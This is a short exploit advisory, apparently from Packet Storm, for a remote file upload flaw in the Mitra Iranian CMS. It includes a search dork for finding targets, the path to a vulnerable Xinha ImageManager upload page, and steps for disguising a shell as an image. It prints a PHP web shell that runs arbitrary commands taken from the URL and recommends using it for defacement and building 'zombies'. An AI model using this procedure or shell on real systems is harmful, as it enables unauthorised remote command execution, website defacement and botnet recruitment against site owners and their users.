Mitra Iranian CMS Shell Upload

2012-02-19T00:00:00
ID PACKETSTORM:109969
Type packetstorm
Reporter BHG Security Center
Modified 2012-02-19T00:00:00

Description

                                        
                                            `#################################################################################  
# Exploit Title: Mitra Iranian CMS Remote File Upload  
# Google Dork: inurl:/plugins/editors/xinha/plugins/ImageManager/  
# Date: 2012/02/19  
# Author: #BHG Security Center  
# Discovered by : Nitrojen90  
# WebSite:WwW.Black-hg.Org  
# Software Link: http://www.nationalcms.ir/  
# Version: All Version  
# Security Risk::High  
# Tested on: Windows  
#################################################################################  
# p0c :  
#  
# http://target.com/plugins/editors/xinha/plugins/ImageManager/manager.php  
#  
# Upload Shell With JPG - GIF - PNG Format In Bug URL and clike the Photo  
#  
# in Browser And Run She Shell Or Make RCE Bug For Run Command With Code :  
#  
#  
# <?php  
# $command = $_GET['command'];  
# system($command);  
# ?>  
#  
# And Use For Deface - Zombies & ... :D  
#  
#################################################################################  
# Special Thanks To : Net.Edit0r - 3H34N - A.Cr0x - 4M!N - ArYaIeIrAN - G3n3rall  
# Mr.XHat - Bl4ck.Viper - Dj.TiniVini  
#################################################################################  
# GreetZ : All Active Member in #BHG Security Center  
#################################################################################  
`